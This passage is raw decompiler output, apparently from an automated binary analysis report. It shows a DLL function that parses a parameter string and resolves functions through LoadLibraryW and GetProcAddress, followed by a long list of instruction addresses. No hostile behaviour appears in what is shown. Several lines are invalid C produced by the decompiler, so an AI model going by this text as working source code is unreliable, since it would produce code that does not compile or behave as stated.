                                                  				signed short _t231;
                                                  				struct HINSTANCE__* _t234;
                                                  				struct HINSTANCE__* _t236;
                                                  				void* _t237;
                                                  				intOrPtr* _t238;
                                                  				void* _t249;
                                                  				signed char _t250;
                                                  				signed int _t251;
                                                  				struct HINSTANCE__* _t257;
                                                  				void* _t258;
                                                  				signed int _t260;
                                                  				signed int _t261;
                                                  				signed short* _t264;
                                                  				signed int _t269;
                                                  				signed int _t272;
                                                  				signed int _t274;
                                                  				void* _t277;
                                                  				void* _t281;
                                                  				struct HINSTANCE__* _t283;
                                                  				signed int _t286;
                                                  				void _t287;
                                                  				signed int _t288;
                                                  				signed int _t300;
                                                  				signed int _t301;
                                                  				signed short _t304;
                                                  				void* _t305;
                                                  				signed int _t309;
                                                  				signed int _t312;
                                                  				signed int _t315;
                                                  				signed int _t316;
                                                  				signed int _t317;
                                                  				signed short* _t321;
                                                  				WCHAR* _t322;
                                                  				WCHAR* _t324;
                                                  				WCHAR* _t325;
                                                  				struct HINSTANCE__* _t326;
                                                  				void* _t328;
                                                  				signed int _t331;
                                                  				void* _t332;
                                                  
                                                  				_t283 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				_v40 = 0;
                                                  				_t332 = 0;
                                                  				_v52 = 0;
                                                  				_v44 = 0;
                                                  				_t208 = E710812BB();
                                                  				_v24 = _t208;
                                                  				_v28 = _t208;
                                                  				_v48 = E710812BB();
                                                  				_t321 = E710812E3();
                                                  				_v56 = _t321;
                                                  				_v12 = _t321;
                                                  				while(1) {
                                                  					_t211 = _v32;
                                                  					_v60 = _t211;
                                                  					if(_t211 != _t283 && _t332 == _t283) {
                                                  						break;
                                                  					}
                                                  					_t286 =  *_t321 & 0x0000ffff;
                                                  					_t213 = _t286 - _t283;
                                                  					if(_t213 == 0) {
                                                  						_t37 =  &_v32;
                                                  						 *_t37 = _v32 | 0xffffffff;
                                                  						__eflags =  *_t37;
                                                  						L20:
                                                  						_t215 = _v60 - _t283;
                                                  						if(_t215 == 0) {
                                                  							__eflags = _t332 - _t283;
                                                  							 *_v28 = _t283;
                                                  							if(_t332 == _t283) {
                                                  								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                  								 *(_t332 + 0x1010) = _t283;
                                                  								 *(_t332 + 0x1014) = _t283;
                                                  							}
                                                  							_t287 = _v36;
                                                  							_t47 = _t332 + 8; // 0x8
                                                  							_t217 = _t47;
                                                  							_t48 = _t332 + 0x808; // 0x808
                                                  							_t322 = _t48;
                                                  							 *_t332 = _t287;
                                                  							_t288 = _t287 - _t283;
                                                  							__eflags = _t288;
                                                  							 *_t217 = _t283;
                                                  							 *_t322 = _t283;
                                                  							 *(_t332 + 0x1008) = _t283;
                                                  							 *(_t332 + 0x100c) = _t283;
                                                  							 *(_t332 + 4) = _t283;
                                                  							if(_t288 == 0) {
                                                  								__eflags = _v28 - _v24;
                                                  								if(_v28 == _v24) {
                                                  									goto L42;
                                                  								}
                                                  								_t328 = 0;
                                                  								GlobalFree(_t332);
                                                  								_t332 = E710813B1(_v24);
                                                  								__eflags = _t332 - _t283;
                                                  								if(_t332 == _t283) {
                                                  									goto L42;
                                                  								} else {
                                                  									goto L35;
                                                  								}
                                                  								while(1) {
                                                  									L35:
                                                  									_t249 =  *(_t332 + 0x1ca0);
                                                  									__eflags = _t249 - _t283;
                                                  									if(_t249 == _t283) {
                                                  										break;
                                                  									}
                                                  									_t328 = _t332;
                                                  									_t332 = _t249;
                                                  									__eflags = _t332 - _t283;
                                                  									if(_t332 != _t283) {
                                                  										continue;
                                                  									}
                                                  									break;
                                                  								}
                                                  								__eflags = _t328 - _t283;
                                                  								if(_t328 != _t283) {
                                                  									 *(_t328 + 0x1ca0) = _t283;
                                                  								}
                                                  								_t250 =  *(_t332 + 0x1010);
                                                  								__eflags = _t250 & 0x00000008;
                                                  								if((_t250 & 0x00000008) == 0) {
                                                  									_t251 = _t250 | 0x00000002;
                                                  									__eflags = _t251;
                                                  									 *(_t332 + 0x1010) = _t251;
                                                  								} else {
                                                  									_t332 = E7108162F(_t332);
                                                  									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                  								}
                                                  								goto L42;
                                                  							} else {
                                                  								_t300 = _t288 - 1;
                                                  								__eflags = _t300;
                                                  								if(_t300 == 0) {
                                                  									L31:
                                                  									lstrcpyW(_t217, _v48);
                                                  									L32:
                                                  									lstrcpyW(_t322, _v24);
                                                  									goto L42;
                                                  								}
                                                  								_t301 = _t300 - 1;
                                                  								__eflags = _t301;
                                                  								if(_t301 == 0) {
                                                  									goto L32;
                                                  								}
                                                  								__eflags = _t301 != 1;
                                                  								if(_t301 != 1) {
                                                  									goto L42;
                                                  								}
                                                  								goto L31;
                                                  							}
                                                  						} else {
                                                  							if(_t215 == 1) {
                                                  								_t257 = _v16;
                                                  								if(_v40 == _t283) {
                                                  									_t257 = _t257 - 1;
                                                  								}
                                                  								 *(_t332 + 0x1014) = _t257;
                                                  							}
                                                  							L42:
                                                  							_v12 = _v12 + 2;
                                                  							_v28 = _v24;
                                                  							L59:
                                                  							if(_v32 != 0xffffffff) {
                                                  								_t321 = _v12;
                                                  								continue;
                                                  							}
                                                  							break;
                                                  						}
                                                  					}
                                                  					_t258 = _t213 - 0x23;
                                                  					if(_t258 == 0) {
                                                  						__eflags = _t321 - _v56;
                                                  						if(_t321 <= _v56) {
                                                  							L17:
                                                  							__eflags = _v44 - _t283;
                                                  							if(_v44 != _t283) {
                                                  								L43:
                                                  								_t260 = _v32 - _t283;
                                                  								__eflags = _t260;
                                                  								if(_t260 == 0) {
                                                  									_t261 = _t286;
                                                  									while(1) {
                                                  										__eflags = _t261 - 0x22;
                                                  										if(_t261 != 0x22) {
                                                  											break;
                                                  										}
                                                  										_t321 =  &(_t321[1]);
                                                  										__eflags = _v44 - _t283;
                                                  										_v12 = _t321;
                                                  										if(_v44 == _t283) {
                                                  											_v44 = 1;
                                                  											L162:
                                                  											_v28 =  &(_v28[0]);
                                                  											 *_v28 =  *_t321;
                                                  											L58:
                                                  											_t331 =  &(_t321[1]);
                                                  											__eflags = _t331;
                                                  											_v12 = _t331;
                                                  											goto L59;
                                                  										}
                                                  										_t261 =  *_t321 & 0x0000ffff;
                                                  										_v44 = _t283;
                                                  									}
                                                  									__eflags = _t261 - 0x2a;
                                                  									if(_t261 == 0x2a) {
                                                  										_v36 = 2;
                                                  										L57:
                                                  										_t321 = _v12;
                                                  										_v28 = _v24;
                                                  										_t283 = 0;
                                                  										__eflags = 0;
                                                  										goto L58;
                                                  									}
                                                  									__eflags = _t261 - 0x2d;
                                                  									if(_t261 == 0x2d) {
                                                  										L151:
                                                  										_t304 =  *_t321;
                                                  										__eflags = _t304 - 0x2d;
                                                  										if(_t304 != 0x2d) {
                                                  											L154:
                                                  											_t264 =  &(_t321[1]);
                                                  											__eflags =  *_t264 - 0x3a;
                                                  											if( *_t264 != 0x3a) {
                                                  												goto L162;
                                                  											}
                                                  											__eflags = _t304 - 0x2d;
                                                  											if(_t304 == 0x2d) {
                                                  												goto L162;
                                                  											}
                                                  											_v36 = 1;
                                                  											L157:
                                                  											_v12 = _t264;
                                                  											__eflags = _v28 - _v24;
                                                  											if(_v28 <= _v24) {
                                                  												 *_v48 = _t283;
                                                  											} else {
                                                  												 *_v28 = _t283;
                                                  												lstrcpyW(_v48, _v24);
                                                  											}
                                                  											goto L57;
                                                  										}
                                                  										_t264 =  &(_t321[1]);
                                                  										__eflags =  *_t264 - 0x3e;
                                                  										if( *_t264 != 0x3e) {
                                                  											goto L154;
                                                  										}
                                                  										_v36 = 3;
                                                  										goto L157;
                                                  									}
                                                  									__eflags = _t261 - 0x3a;
                                                  									if(_t261 != 0x3a) {
                                                  										goto L162;
                                                  									}
                                                  									goto L151;
                                                  								}
                                                  								_t269 = _t260 - 1;
                                                  								__eflags = _t269;
                                                  								if(_t269 == 0) {
                                                  									L80:
                                                  									_t305 = _t286 + 0xffffffde;
                                                  									__eflags = _t305 - 0x55;
                                                  									if(_t305 > 0x55) {
                                                  										goto L57;
                                                  									}
                                                  									switch( *((intOrPtr*)(( *(_t305 + 0x710823e8) & 0x000000ff) * 4 +  &M7108235C))) {
                                                  										case 0:
                                                  											__ecx = _v24;
                                                  											__edi = _v12;
                                                  											while(1) {
                                                  												__edi = __edi + 1;
                                                  												__edi = __edi + 1;
                                                  												_v12 = __edi;
                                                  												__ax =  *__edi;
                                                  												__eflags = __ax - __dx;
                                                  												if(__ax != __dx) {
                                                  													goto L132;
                                                  												}
                                                  												L131:
                                                  												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                  												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                  													L136:
                                                  													 *__ecx =  *__ecx & 0x00000000;
                                                  													__eax = E710812CC(_v24);
                                                  													__ebx = __eax;
                                                  													goto L97;
                                                  												}
                                                  												L132:
                                                  												__eflags = __ax;
                                                  												if(__ax == 0) {
                                                  													goto L136;
                                                  												}
                                                  												__eflags = __ax - __dx;
                                                  												if(__ax == __dx) {
                                                  													__edi = __edi + 1;
                                                  													__edi = __edi + 1;
                                                  													__eflags = __edi;
                                                  												}
                                                  												__ax =  *__edi;
                                                  												 *__ecx =  *__edi;
                                                  												__ecx = __ecx + 1;
                                                  												__ecx = __ecx + 1;
                                                  												__edi = __edi + 1;
                                                  												__edi = __edi + 1;
                                                  												_v12 = __edi;
                                                  												__ax =  *__edi;
                                                  												__eflags = __ax - __dx;
                                                  												if(__ax != __dx) {
                                                  													goto L132;
                                                  												}
                                                  												goto L131;
                                                  											}
                                                  										case 1:
                                                  											_v8 = 1;
                                                  											goto L57;
                                                  										case 2:
                                                  											_v8 = _v8 | 0xffffffff;
                                                  											goto L57;
                                                  										case 3:
                                                  											_v8 = _v8 & 0x00000000;
                                                  											_v20 = _v20 & 0x00000000;
                                                  											_v16 = _v16 + 1;
                                                  											goto L85;
                                                  										case 4:
                                                  											__eflags = _v20;
                                                  											if(_v20 != 0) {
                                                  												goto L57;
                                                  											}
                                                  											_v12 = _v12 - 2;
                                                  											__ebx = E710812BB();
                                                  											 &_v12 = E71081B86( &_v12);
                                                  											__eax = E71081510(__edx, __eax, __edx, __ebx);
                                                  											goto L97;
                                                  										case 5:
                                                  											L105:
                                                  											_v20 = _v20 + 1;
                                                  											goto L57;
                                                  										case 6:
                                                  											_push(7);
                                                  											goto L123;
                                                  										case 7:
                                                  											_push(0x19);
                                                  											goto L143;
                                                  										case 8:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L107;
                                                  										case 9:
                                                  											_push(0x15);
                                                  											goto L143;
                                                  										case 0xa:
                                                  											_push(0x16);
                                                  											goto L143;
                                                  										case 0xb:
                                                  											_push(0x18);
                                                  											goto L143;
                                                  										case 0xc:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L118;
                                                  										case 0xd:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L109;
                                                  										case 0xe:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L111;
                                                  										case 0xf:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L122;
                                                  										case 0x10:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L113;
                                                  										case 0x11:
                                                  											_push(3);
                                                  											goto L123;
                                                  										case 0x12:
                                                  											_push(0x17);
                                                  											L143:
                                                  											_pop(__ebx);
                                                  											goto L98;
                                                  										case 0x13:
                                                  											__eax =  &_v12;
                                                  											__eax = E71081B86( &_v12);
                                                  											__ebx = __eax;
                                                  											__ebx = __eax + 1;
                                                  											__eflags = __ebx - 0xb;
                                                  											if(__ebx < 0xb) {
                                                  												__ebx = __ebx + 0xa;
                                                  											}
                                                  											goto L97;
                                                  										case 0x14:
                                                  											__ebx = 0xffffffff;
                                                  											goto L98;
                                                  										case 0x15:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L116;
                                                  										case 0x16:
                                                  											__ecx = 0;
                                                  											__eflags = 0;
                                                  											goto L91;
                                                  										case 0x17:
                                                  											__eax = 0;
                                                  											__eax = 1;
                                                  											__eflags = 1;
                                                  											goto L120;
                                                  										case 0x18:
                                                  											_t271 =  *(_t332 + 0x1014);
                                                  											__eflags = _t271 - _v16;
                                                  											if(_t271 > _v16) {
                                                  												_v16 = _t271;
                                                  											}
                                                  											_v8 = _v8 & 0x00000000;
                                                  											_v20 = _v20 & 0x00000000;
                                                  											_v36 - 3 = _t271 - (_v36 == 3);
                                                  											if(_t271 != _v36 == 3) {
                                                  												L85:
                                                  												_v40 = 1;
                                                  											}
                                                  											goto L57;
                                                  										case 0x19:
                                                  											L107:
                                                  											__ecx = 0;
                                                  											_v8 = 2;
                                                  											__ecx = 1;
                                                  											goto L91;
                                                  										case 0x1a:
                                                  											L118:
                                                  											_push(5);
                                                  											goto L123;
                                                  										case 0x1b:
                                                  											L109:
                                                  											__ecx = 0;
                                                  											_v8 = 3;
                                                  											__ecx = 1;
                                                  											goto L91;
                                                  										case 0x1c:
                                                  											L111:
                                                  											__ecx = 0;
                                                  											__ecx = 1;
                                                  											goto L91;
                                                  										case 0x1d:
                                                  											L122:
                                                  											_push(6);
                                                  											goto L123;
                                                  										case 0x1e:
                                                  											L113:
                                                  											_push(2);
                                                  											goto L123;
                                                  										case 0x1f:
                                                  											__eax =  &_v12;
                                                  											__eax = E71081B86( &_v12);
                                                  											__ebx = __eax;
                                                  											__ebx = __eax + 1;
                                                  											goto L97;
                                                  										case 0x20:
                                                  											L116:
                                                  											_v52 = _v52 + 1;
                                                  											_push(4);
                                                  											_pop(__ecx);
                                                  											goto L91;
                                                  										case 0x21:
                                                  											L120:
                                                  											_push(4);
                                                  											L123:
                                                  											_pop(__ecx);
                                                  											L91:
                                                  											__edi = _v16;
                                                  											__edx =  *(0x7108405c + __ecx * 4);
                                                  											__eax =  ~__eax;
                                                  											asm("sbb eax, eax");
                                                  											_v40 = 1;
                                                  											__edi = _v16 << 5;
                                                  											__eax = __eax & 0x00008000;
                                                  											__edi = (_v16 << 5) + __esi;
                                                  											__eax = __eax | __ecx;
                                                  											__eflags = _v8;
                                                  											 *(__edi + 0x1018) = __eax;
                                                  											if(_v8 < 0) {
                                                  												L93:
                                                  												__edx = 0;
                                                  												__edx = 1;
                                                  												__eflags = 1;
                                                  												L94:
                                                  												__eflags = _v8 - 1;
                                                  												 *(__edi + 0x1028) = __edx;
                                                  												if(_v8 == 1) {
                                                  													__eax =  &_v12;
                                                  													__eax = E71081B86( &_v12);
                                                  													__eax = __eax + 1;
                                                  													__eflags = __eax;
                                                  													_v8 = __eax;
                                                  												}
                                                  												__eax = _v8;
                                                  												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                  												_t136 = _v16 + 0x81; // 0x81
                                                  												_t136 = _t136 << 5;
                                                  												__eax = 0;
                                                  												__eflags = 0;
                                                  												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                  												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                  												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                  												L97:
                                                  												__eflags = __ebx;
                                                  												if(__ebx == 0) {
                                                  													goto L57;
                                                  												}
                                                  												L98:
                                                  												__eflags = _v20;
                                                  												_v40 = 1;
                                                  												if(_v20 != 0) {
                                                  													L103:
                                                  													__eflags = _v20 - 1;
                                                  													if(_v20 == 1) {
                                                  														__eax = _v16;
                                                  														__eax = _v16 << 5;
                                                  														__eflags = __eax;
                                                  														 *(__eax + __esi + 0x102c) = __ebx;
                                                  													}
                                                  													goto L105;
                                                  												}
                                                  												_v16 = _v16 << 5;
                                                  												_t144 = __esi + 0x1030; // 0x1030
                                                  												__edi = (_v16 << 5) + _t144;
                                                  												__eax =  *__edi;
                                                  												__eflags = __eax - 0xffffffff;
                                                  												if(__eax <= 0xffffffff) {
                                                  													L101:
                                                  													__eax = GlobalFree(__eax);
                                                  													L102:
                                                  													 *__edi = __ebx;
                                                  													goto L103;
                                                  												}
                                                  												__eflags = __eax - 0x19;
                                                  												if(__eax <= 0x19) {
                                                  													goto L102;
                                                  												}
                                                  												goto L101;
                                                  											}
                                                  											__eflags = __edx;
                                                  											if(__edx > 0) {
                                                  												goto L94;
                                                  											}
                                                  											goto L93;
                                                  										case 0x22:
                                                  											goto L57;
                                                  									}
                                                  								}
                                                  								_t272 = _t269 - 1;
                                                  								__eflags = _t272;
                                                  								if(_t272 == 0) {
                                                  									_v16 = _t283;
                                                  									goto L80;
                                                  								}
                                                  								__eflags = _t272 != 1;
                                                  								if(_t272 != 1) {
                                                  									goto L162;
                                                  								}
                                                  								__eflags = _t286 - 0x6e;
                                                  								if(__eflags > 0) {
                                                  									_t309 = _t286 - 0x72;
                                                  									__eflags = _t309;
                                                  									if(_t309 == 0) {
                                                  										_push(4);
                                                  										L74:
                                                  										_pop(_t274);
                                                  										L75:
                                                  										__eflags = _v8 - 1;
                                                  										if(_v8 != 1) {
                                                  											_t96 = _t332 + 0x1010;
                                                  											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                  											__eflags =  *_t96;
                                                  										} else {
                                                  											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                  										}
                                                  										_v8 = 1;
                                                  										goto L57;
                                                  									}
                                                  									_t312 = _t309 - 1;
                                                  									__eflags = _t312;
                                                  									if(_t312 == 0) {
                                                  										_push(0x10);
                                                  										goto L74;
                                                  									}
                                                  									__eflags = _t312 != 0;
                                                  									if(_t312 != 0) {
                                                  										goto L57;
                                                  									}
                                                  									_push(0x40);
                                                  									goto L74;
                                                  								}
                                                  								if(__eflags == 0) {
                                                  									_push(8);
                                                  									goto L74;
                                                  								}
                                                  								_t315 = _t286 - 0x21;
                                                  								__eflags = _t315;
                                                  								if(_t315 == 0) {
                                                  									_v8 =  ~_v8;
                                                  									goto L57;
                                                  								}
                                                  								_t316 = _t315 - 0x11;
                                                  								__eflags = _t316;
                                                  								if(_t316 == 0) {
                                                  									_t274 = 0x100;
                                                  									goto L75;
                                                  								}
                                                  								_t317 = _t316 - 0x31;
                                                  								__eflags = _t317;
                                                  								if(_t317 == 0) {
                                                  									_t274 = 1;
                                                  									goto L75;
                                                  								}
                                                  								__eflags = _t317 != 0;
                                                  								if(_t317 != 0) {
                                                  									goto L57;
                                                  								}
                                                  								_push(0x20);
                                                  								goto L74;
                                                  							} else {
                                                  								_v32 = _t283;
                                                  								_v36 = _t283;
                                                  								goto L20;
                                                  							}
                                                  						}
                                                  						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                  						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                  							goto L17;
                                                  						}
                                                  						__eflags = _v32 - _t283;
                                                  						if(_v32 == _t283) {
                                                  							goto L43;
                                                  						}
                                                  						goto L17;
                                                  					}
                                                  					_t277 = _t258 - 5;
                                                  					if(_t277 == 0) {
                                                  						__eflags = _v44 - _t283;
                                                  						if(_v44 != _t283) {
                                                  							goto L43;
                                                  						} else {
                                                  							__eflags = _v36 - 3;
                                                  							_v32 = 1;
                                                  							_v8 = _t283;
                                                  							_v20 = _t283;
                                                  							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                  							_v40 = _t283;
                                                  							goto L20;
                                                  						}
                                                  					}
                                                  					_t281 = _t277 - 1;
                                                  					if(_t281 == 0) {
                                                  						__eflags = _v44 - _t283;
                                                  						if(_v44 != _t283) {
                                                  							goto L43;
                                                  						} else {
                                                  							_v32 = 2;
                                                  							_v8 = _t283;
                                                  							_v20 = _t283;
                                                  							goto L20;
                                                  						}
                                                  					}
                                                  					if(_t281 != 0x16) {
                                                  						goto L43;
                                                  					} else {
                                                  						_v32 = 3;
                                                  						_v8 = 1;
                                                  						goto L20;
                                                  					}
                                                  				}
                                                  				GlobalFree(_v56);
                                                  				GlobalFree(_v24);
                                                  				GlobalFree(_v48);
                                                  				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                  					L182:
                                                  					return _t332;
                                                  				} else {
                                                  					_t225 =  *_t332 - 1;
                                                  					if(_t225 == 0) {
                                                  						_t187 = _t332 + 8; // 0x8
                                                  						_t324 = _t187;
                                                  						__eflags =  *_t324 - _t283;
                                                  						if( *_t324 != _t283) {
                                                  							_t226 = GetModuleHandleW(_t324);
                                                  							__eflags = _t226 - _t283;
                                                  							 *(_t332 + 0x1008) = _t226;
                                                  							if(_t226 != _t283) {
                                                  								L171:
                                                  								_t192 = _t332 + 0x808; // 0x808
                                                  								_t325 = _t192;
                                                  								_t227 = E710816BD( *(_t332 + 0x1008), _t325);
                                                  								__eflags = _t227 - _t283;
                                                  								 *(_t332 + 0x100c) = _t227;
                                                  								if(_t227 == _t283) {
                                                  									__eflags =  *_t325 - 0x23;
                                                  									if( *_t325 == 0x23) {
                                                  										_t195 = _t332 + 0x80a; // 0x80a
                                                  										_t231 = E710813B1(_t195);
                                                  										__eflags = _t231 - _t283;
                                                  										if(_t231 != _t283) {
                                                  											__eflags = _t231 & 0xffff0000;
                                                  											if((_t231 & 0xffff0000) == 0) {
                                                  												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								__eflags = _v52 - _t283;
                                                  								if(_v52 != _t283) {
                                                  									L178:
                                                  									_t325[lstrlenW(_t325)] = 0x57;
                                                  									_t229 = E710816BD( *(_t332 + 0x1008), _t325);
                                                  									__eflags = _t229 - _t283;
                                                  									if(_t229 != _t283) {
                                                  										L166:
                                                  										 *(_t332 + 0x100c) = _t229;
                                                  										goto L182;
                                                  									}
                                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                                  									L180:
                                                  									if(__eflags != 0) {
                                                  										goto L182;
                                                  									}
                                                  									L181:
                                                  									_t206 = _t332 + 4;
                                                  									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                  									__eflags =  *_t206;
                                                  									goto L182;
                                                  								} else {
                                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                                  									if( *(_t332 + 0x100c) != _t283) {
                                                  										goto L182;
                                                  									}
                                                  									goto L178;
                                                  								}
                                                  							}
                                                  							_t234 = LoadLibraryW(_t324);
                                                  							__eflags = _t234 - _t283;
                                                  							 *(_t332 + 0x1008) = _t234;
                                                  							if(_t234 == _t283) {
                                                  								goto L181;
                                                  							}
                                                  							goto L171;
                                                  						}
                                                  						_t188 = _t332 + 0x808; // 0x808
                                                  						_t236 = E710813B1(_t188);
                                                  						 *(_t332 + 0x100c) = _t236;
                                                  						__eflags = _t236 - _t283;
                                                  						goto L180;
                                                  					}
                                                  					_t237 = _t225 - 1;
                                                  					if(_t237 == 0) {
                                                  						_t185 = _t332 + 0x808; // 0x808
                                                  						_t238 = _t185;
                                                  						__eflags =  *_t238 - _t283;
                                                  						if( *_t238 == _t283) {
                                                  							goto L182;
                                                  						}
                                                  						_t229 = E710813B1(_t238);
                                                  						L165:
                                                  						goto L166;
                                                  					}
                                                  					if(_t237 != 1) {
                                                  						goto L182;
                                                  					}
                                                  					_t81 = _t332 + 8; // 0x8
                                                  					_t284 = _t81;
                                                  					_t326 = E710813B1(_t81);
                                                  					 *(_t332 + 0x1008) = _t326;
                                                  					if(_t326 == 0) {
                                                  						goto L181;
                                                  					}
                                                  					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                  					 *((intOrPtr*)(_t332 + 0x1050)) = E710812CC(_t284);
                                                  					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                  					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                  					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                  					_t90 = _t332 + 0x808; // 0x808
                                                  					_t229 =  *(_t326->i + E710813B1(_t90) * 4);
                                                  					goto L165;
                                                  				}
                                                  			}

































































                                                  0x71081c07
                                                  0x71081c0a
                                                  0x71081c0d
                                                  0x71081c10
                                                  0x71081c13
                                                  0x71081c16
                                                  0x71081c19
                                                  0x71081c1b
                                                  0x71081c1e
                                                  0x71081c21
                                                  0x71081c26
                                                  0x71081c29
                                                  0x71081c31
                                                  0x71081c39
                                                  0x71081c3b
                                                  0x71081c3e
                                                  0x71081c46
                                                  0x71081c46
                                                  0x71081c4b
                                                  0x71081c4e
                                                  0x00000000
                                                  0x00000000
                                                  0x71081c5b
                                                  0x71081c60
                                                  0x71081c62
                                                  0x71081cf4
                                                  0x71081cf4
                                                  0x71081cf4
                                                  0x71081cf8
                                                  0x71081cfb
                                                  0x71081cfd
                                                  0x71081d1f
                                                  0x71081d21
                                                  0x71081d24
                                                  0x71081d33
                                                  0x71081d35
                                                  0x71081d3b
                                                  0x71081d3b
                                                  0x71081d41
                                                  0x71081d44
                                                  0x71081d44
                                                  0x71081d47
                                                  0x71081d47
                                                  0x71081d4d
                                                  0x71081d4f
                                                  0x71081d4f
                                                  0x71081d51
                                                  0x71081d54
                                                  0x71081d57
                                                  0x71081d5d
                                                  0x71081d63
                                                  0x71081d66
                                                  0x71081d8a
                                                  0x71081d8d
                                                  0x00000000
                                                  0x00000000
                                                  0x71081d90
                                                  0x71081d92
                                                  0x71081da0
                                                  0x71081da3
                                                  0x71081da5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71081da7
                                                  0x71081da7
                                                  0x71081da7
                                                  0x71081dad
                                                  0x71081daf
                                                  0x00000000
                                                  0x00000000
                                                  0x71081db1
                                                  0x71081db3
                                                  0x71081db5
                                                  0x71081db7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71081db7
                                                  0x71081db9
                                                  0x71081dbb
                                                  0x71081dbd
                                                  0x71081dbd
                                                  0x71081dc3
                                                  0x71081dc9
                                                  0x71081dcb
                                                  0x71081ddf
                                                  0x71081ddf
                                                  0x71081de1
                                                  0x71081dcd
                                                  0x71081dd3
                                                  0x71081dd6
                                                  0x71081dd6
                                                  0x00000000
                                                  0x71081d68
                                                  0x71081d68
                                                  0x71081d68
                                                  0x71081d69
                                                  0x71081d71
                                                  0x71081d75
                                                  0x71081d7b
                                                  0x71081d7f
                                                  0x00000000
                                                  0x71081d7f
                                                  0x71081d6b
                                                  0x71081d6b
                                                  0x71081d6c
                                                  0x00000000
                                                  0x00000000
                                                  0x71081d6e
                                                  0x71081d6f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71081d6f
                                                  0x71081cff
                                                  0x71081d00
                                                  0x71081d09
                                                  0x71081d0c
                                                  0x71081d19
                                                  0x71081d19
                                                  0x71081d0e
                                                  0x71081d0e
                                                  0x71081de7
                                                  0x71081dea
                                                  0x71081dee
                                                  0x71081e61
                                                  0x71081e65
                                                  0x71081c43
                                                  0x00000000
                                                  0x71081c43
                                                  0x00000000
                                                  0x71081e65
                                                  0x71081cfd
                                                  0x71081c68
                                                  0x71081c6b
                                                  0x71081cce
                                                  0x71081cd1
                                                  0x71081ce3
                                                  0x71081ce3
                                                  0x71081ce6
                                                  0x71081df3
                                                  0x71081df6
                                                  0x71081df6
                                                  0x71081df8
                                                  0x710821ae
                                                  0x710821c6
                                                  0x710821c6
                                                  0x710821c9
                                                  0x00000000
                                                  0x00000000
                                                  0x710821b3
                                                  0x710821b4
                                                  0x710821b7
                                                  0x710821ba
                                                  0x71082244
                                                  0x7108224b
                                                  0x71082251
                                                  0x71082255
                                                  0x71081e5c
                                                  0x71081e5d
                                                  0x71081e5d
                                                  0x71081e5e
                                                  0x00000000
                                                  0x71081e5e
                                                  0x710821c0
                                                  0x710821c3
                                                  0x710821c3
                                                  0x710821cb
                                                  0x710821ce
                                                  0x71082238
                                                  0x71081e51
                                                  0x71081e54
                                                  0x71081e57
                                                  0x71081e5a
                                                  0x71081e5a
                                                  0x00000000
                                                  0x71081e5a
                                                  0x710821d0
                                                  0x710821d3
                                                  0x710821da
                                                  0x710821da
                                                  0x710821dd
                                                  0x710821e1
                                                  0x710821f5
                                                  0x710821f5
                                                  0x710821f8
                                                  0x710821fc
                                                  0x00000000
                                                  0x00000000
                                                  0x710821fe
                                                  0x71082202
                                                  0x00000000
                                                  0x00000000
                                                  0x71082204
                                                  0x7108220b
                                                  0x7108220b
                                                  0x71082211
                                                  0x71082214
                                                  0x71082230
                                                  0x71082216
                                                  0x7108221f
                                                  0x71082222
                                                  0x71082222
                                                  0x00000000
                                                  0x71082214
                                                  0x710821e3
                                                  0x710821e6
                                                  0x710821ea
                                                  0x00000000
                                                  0x00000000
                                                  0x710821ec
                                                  0x00000000
                                                  0x710821ec
                                                  0x710821d5
                                                  0x710821d8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x710821d8
                                                  0x71081dfe
                                                  0x71081dfe
                                                  0x71081dff
                                                  0x71081f49
                                                  0x71081f49
                                                  0x71081f50
                                                  0x71081f53
                                                  0x00000000
                                                  0x00000000
                                                  0x71081f60
                                                  0x00000000
                                                  0x7108214b
                                                  0x7108214e
                                                  0x71082151
                                                  0x71082151
                                                  0x71082152
                                                  0x71082153
                                                  0x71082156
                                                  0x71082159
                                                  0x7108215c
                                                  0x00000000
                                                  0x00000000
                                                  0x7108215e
                                                  0x7108215e
                                                  0x71082162
                                                  0x7108217a
                                                  0x7108217d
                                                  0x71082181
                                                  0x71082187
                                                  0x00000000
                                                  0x71082187
                                                  0x71082164
                                                  0x71082164
                                                  0x71082167
                                                  0x00000000
                                                  0x00000000
                                                  0x71082169
